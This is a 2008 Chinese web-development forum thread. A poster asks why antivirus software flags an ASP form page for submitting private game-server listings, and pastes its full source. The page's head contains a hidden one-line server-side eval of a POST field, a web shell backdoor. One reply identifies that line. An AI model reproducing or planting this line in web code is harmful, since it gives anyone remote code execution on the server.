add.ASP报病毒

最后的梦想 2008-07-22 10:14:24
有空帮忙看下该文件代码哪里有问题导致杀毒软件提示病毒的
应该怎么修改?谢谢
...全文
106 7 打赏 收藏 转发到动态 举报
写回复
用AI写文章
7 条回复
切换为时间正序
请发表友善的回复…
发表回复
最后的梦想 2008-07-22
  • 打赏
  • 举报
回复
需要对此做什么修改呢?
[Quote=引用 6 楼 it5454 的回复:]
try{eval(Request.form('#')+'')}catch(e){}
出现EVAL这句大多杀毒软件都会报毒的
[/Quote]
it5454 2008-07-22
  • 打赏
  • 举报
回复
try{eval(Request.form('#')+'')}catch(e){}
出现EVAL这句大多杀毒软件都会报毒的
最后的梦想 2008-07-22
  • 打赏
  • 举报
回复
<table width="50%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="5"></td>
</tr>
</table>
<TABLE cellSpacing=1 cellPadding=3 width=990 align=center bgColor=#000000
border=0>
<FORM name=form1 onSubmit="return check()" action=save.asp method=post>
<TBODY>
<TR bgColor=#FFFFFF>
<TD width="15%" align="right" bgcolor="#EFEFEF"> 服务器名称:</TD>
<TD> 
<INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
maxLength=8 name=name>
<FONT color=#ff0000>* 不得带有任何特殊符号,不得超过8个汉字,否则不与发布!</FONT></TD>
</TR>
<TR bgColor=#FFFFFF>
<TD width="15%" align="right" bgcolor="#EFEFEF"> IP地址:</TD>
<TD> 
<INPUT style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
maxLength=16 name=ip>
<FONT color=#ff0000>* 不得带有任何特殊符号,不得超过8个汉字<16个字符>,否则不与发布!</FONT></TD>
</TR>
<TR bgColor=#FFFFFF>
<TD width="15%" align="right" bgcolor="#EFEFEF">私服类型/版本:</TD>
<TD> 
<%
Set Rs_type = Server.CreateObject("ADODB.RecordSet")
Sql_Type="select * from GameType order by orderid"
rs_type.open sql_type,conn,1,1
%>
<SELECT id=gameid style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=1 name=gameid>
<%
if rs_type.eof and rs_type.bof then
response.Write "<option value= selected>请添加游戏分类</option>"
else
response.Write "<option selected>选择游戏分类</option>"
do while not rs_type.EOF
response.Write "<option value="&rs_type("id")&">"&rs_type("game")&"</option>"
rs_type.movenext
loop
rs_type.close
set rs_type=nothing
end if
%>
</SELECT>
<INPUT style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
maxLength=18 name=xingzhi id="xingzhi">
<%
Set Rs_ver = Server.CreateObject("ADODB.RecordSet")
Sql_ver="select * from Gamever order by orderid"
rs_ver.open sql_ver,conn,1,1
%>
<SELECT id=xingzhi2 style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=1 name=xingzhi2 onchange="(document.form1.xingzhi.value=this.options[this.selectedIndex].value)">
<%
if rs_ver.eof and rs_ver.bof then
response.Write "<option value= selected>没有预设游戏版本</option>"
else
response.Write "<option selected>版本参考</option>"
do while not rs_ver.EOF
response.Write "<option value="&rs_ver("ver")&">"&rs_ver("ver")&"</option>"
rs_ver.movenext
loop
rs_ver.close
set rs_ver=nothing
end if
%>
</SELECT>
<FONT color=#ff0000>* 最多18个汉字。</FONT> </TD>
</TR>
<TR bgColor=#FFFFFF>
<TD width="15%" align="right" bgcolor="#EFEFEF"> 网络类型:</TD>
<TD> 
<INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
maxLength=6 name=addr>
<FONT color=#ff0000>* 最多填写6个汉字。</FONT>
</TD>
</TR>
<TR bgColor=#FFFFFF>
<TD width="15%" align="right" bgcolor="#EFEFEF"> 正常在线人数:</TD>
<TD> 
<SELECT id=renshu style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=1 name=renshu>
<option selected>〓 请选择在线人数 〓</option>
<%for i=0 to ubound(split(rsign,","))
response.write "<option value='"&i&"'>"&split(rsign,",")(i)&"</option>"
next%>
</SELECT> <FONT color=#ff0000>*</FONT></TD>
</TR>
<TR bgColor=#FFFFFF>
<TD width="15%" align="right" bgcolor="#EFEFEF"> 开区日期/时间:</TD>
<TD> 

<INPUT name=Sdate id=Sdate style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" value="<%=now()%>" size=19 maxLength=19>
 <FONT color=#ff0000>* 默认为系统时间。</FONT>格式为“年-月-日 时:分:秒”,如:<FONT color=#0000ff>2008-6-1 12:32:50</FONT></TD>
</TR>
<TR bgColor=#FFFFFF>
<TD width="15%" align="right" bgcolor="#EFEFEF">客服QQ:</TD>
<TD> 
<INPUT
id=Sdate style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
maxLength=12 name=email> <FONT color=#ff0000>* 请填写您的客服QQ号码。</FONT></TD>
</TR>
<TR bgColor=#FFFFFF>
<TD width="15%" align="right" valign="top" bgcolor="#EFEFEF">
私服简介:</TD>
<TD> 
<TEXTAREA id=main name=main rows=15 cols=85></TEXTAREA>
<FONT
color=#ff0000>*</FONT></TD>
</TR>
<TR bgColor=#FFFFFF>
<TD width="15%" align="right" bgcolor="#EFEFEF">
添加人:</TD>
<TD> 
<INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
maxLength=20 name=addname></TD>
</TR>

<TR bgColor=#FFFFFF>
<TD width="15%" align="right" bgcolor="#EFEFEF">主页地址:</TD>
<TD> 
<input name=homepage id=homepage
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" value="http://" size=36
maxlength=100> <FONT color=#ff0000>* 以便玩家及时查找</FONT></TD>
</TR>
<TR bgColor=#FFFFFF>
<TD width="15%" align="right" bgcolor="#EFEFEF"> 登陆器下载地址:</TD>
<TD> 
<INPUT name=download id=download
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" value="http://" size=36
maxLength=100> <FONT color=#ff0000>* 以便玩家及时登陆</FONT></TD>
</TR>
<TR align="center" bgColor=#FFFFFF>
<TD colSpan=2><font color="#FF0000">为了你私服的人气,建议你详细、准确的填写上述资料。</font></TD>
</TR>
<TR bgColor=#FFFFFF>
<TD colSpan=2> <DIV align=center>
<INPUT type=submit value=" 确 定 " name=submit2>
  
<INPUT type=reset value=" 清 除 " name=cmdcancel>
</DIV></TD>
</TR>
</TBODY>
</FORM>
</TABLE>
<!--#include file="foot.asp"-->
</BODY></HTML>
最后的梦想 2008-07-22
  • 打赏
  • 举报
回复
代码如下:
<!--#include file="config.asp"-->
<!--#include file="conn.asp"-->
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<TITLE><%=webname%>::私服信息登记</TITLE>
<LINK href="image/css.css" type=text/css rel=stylesheet>
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>
<SCRIPT language=JavaScript>
function check(){
if(document.form1.name.value=="")
{
alert("私服服务器名称不能为空!");
document.form1.name.focus();
return false;
}
if(document.form1.ip.value=="")
{
alert("IP地址不能为空!");
document.form1.ip.focus();
return false;
}
if(document.form1.gameid.value=="")
{
alert("请选择您要发布的私服类型!");
document.form1.gameid.focus();
return false;
}
if(document.form1.addr.value=="")
{
alert("网络类型不能为空!");
document.form1.addr.focus();
return false;
}
if(document.form1.renshu.value=="")
{
alert("请选择您的服务器在线人数!");
document.form1.renshu.focus();
return false;
}
if(document.form1.Sdate.value=="")
{
alert("请填写开区具体时间!");
document.form1.Sdate.focus();
return false;
}
if(document.form1.xingzhi.value=="")
{
alert("游戏版本不能为空!");
document.form1.xingzhi.focus();
return false;
}
if(document.form1.email.value=="")
{
alert("客服QQ不能为空!");
document.form1.email.focus();
return false;
}

if(document.form1.main.value=="")
{
alert("服务器简介不能为空!");
document.form1.main.focus();
return false;
}
}
</SCRIPT>
</HEAD>
<BODY text=#000000 link=#000000 leftMargin=0 background="<%=bgimage%>" topMargin=0>
<!--#include file="top.asp"-->
<TABLE cellSpacing=1 cellPadding=3 width=990 align=center bgColor=#000000
border=0>
<TBODY>
<TR>
<TD height="25" align="center" bgColor=#EFEFEF>:::私服发布说明:::</TD>
</TR>
<TR>
<TD bgColor=#FFFFFF><TABLE cellSpacing=0 cellPadding=3 width="95%" align=center
border=0>
<TBODY>
<TR>
<TD>  (1)<%=webname%> 游戏私服发布采用管理员审核制发布系统!不得在本站重复发布信息,否则相同信息全部删除!</TD>
</TR>
<TR>
<TD>  (2)<FONT
color=#ff0000>请按照要求,把您的私服的信息登记完整,树立良好的发布道德切勿发布与私服无关信息或重复发布信息,否则您的私服信息将不会通过我们的审核!</FONT></TD>
</TR>
<TR>
<TD>  (3)<FONT
color=#0066ff>“服务器名称”:必须正确填写,不得出现“推荐”、“新开”等字样;不得出现各类特殊字符(只能包含汉字、数字、英文字母),否则您的私服信息将不会通过我们的审核;“IP地址”:如果是动态IP,则请填写动态域名或官方网站域名!</FONT></TD>
</TR>
<TR>
<TD>  (4)<FONT
color=#009900>如果您的私服没有官方网站或者官方讨论区,则您的私服信息将不会通过我们的审核,您可以先联系我们的客服人员(<%=webmaster%>)为您在本站论坛开辟您的私服官方讨论区后,再审核通过您的私服!</FONT></TD>
</TR>
<TR>
<TD>  (5)如果利用本系统发布违法、黄色、反动信息,本站立刻查明ip并交于公安机关查办!</TD>
</TR>
</TBODY>
</TABLE>
<TABLE cellSpacing=0 cellPadding=3 width="95%" align=center border=0>
<TBODY>
<tr>
<TD>   (6)以上是<%=webname%>私服发布条例谢谢遵守,希望在这里你能查到自己所要的私服信息。对于以上说明有任何疑问,请联系我们的客服人员(<%=webmaster%>)。</TD>
</tr>
<TR>
<TD>    
(7)以下内容必须真实填写,资料不完整以及没有加入连接将无法通过审核发布(请阅读须知)<br>
-----------------------------------------------------------------<br>
必须真实提供:私服名称;IP或者私服网站地址;gm联系方式(QQ,MSN等);私服简介。<br>
--------------------------------------------------------------------------------------<br>
<font color="#FF0000">注:在发布私服前请确认您的网站已经做好本站的连接,不然我们不保证通过您的私服!! </font></TD>
</TR>
</TBODY>
</TABLE></TD>
</TR>
</TBODY></TABLE>
七胖儿 2008-07-22
  • 打赏
  • 举报
回复
怕中毒,呵呵
你把代码贴上来比较实在以点
ttt2 2008-07-22
  • 打赏
  • 举报
回复
如果是卡巴就正常,把我的网页删过,没提示:)
mnm326 2008-07-22
  • 打赏
  • 举报
回复
该文件我不敢看,但你可以查查该文件的源代码是否包含了非自己的代码,

28,391

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧